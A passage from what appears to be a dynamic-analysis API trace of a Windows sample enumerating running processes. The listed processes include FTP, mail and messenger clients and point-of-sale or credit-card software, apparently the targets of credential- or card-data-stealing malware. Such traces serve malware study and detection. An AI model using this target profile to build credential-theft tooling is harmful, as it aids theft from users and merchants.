th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0245.901] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0245.908] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0245.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0245.913] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0245.915] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0245.917] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0245.924] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0245.926] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0245.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0245.929] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0245.931] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0245.933] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0245.976] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0245.979] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0245.981] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0245.988] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0245.991] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0245.994] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0246.002] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0246.005] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0246.008] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0246.011] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0246.019] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0246.021] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0246.024] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0246.026] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0246.080] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0246.082] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0246.084] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0246.086] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0246.087] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0246.089] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0246.093] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0246.095] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0246.096] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0246.098] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0246.100] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0246.101] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0246.103] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0246.104] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.106] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.110] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.112] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.113] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.115] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0246.116] CloseHandle (hObject=0x758) returned 1 [0246.116] Sleep (dwMilliseconds=0x64) [0246.235] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0246.245] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.249] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.251] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.252] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.254] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.256] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.257] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.258] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.260] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.261] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.267] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.269] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.270] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.272] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.273] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.275] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.276] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.330] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.332] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.333] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.335] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0246.336] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0246.337] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.339] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.344] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0246.346] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0246.347] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0246.349] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.350] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0246.352] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0246.354] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.376] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.379] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0246.381] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0246.383] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0246.384] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0246.386] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0246.413] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0246.414] 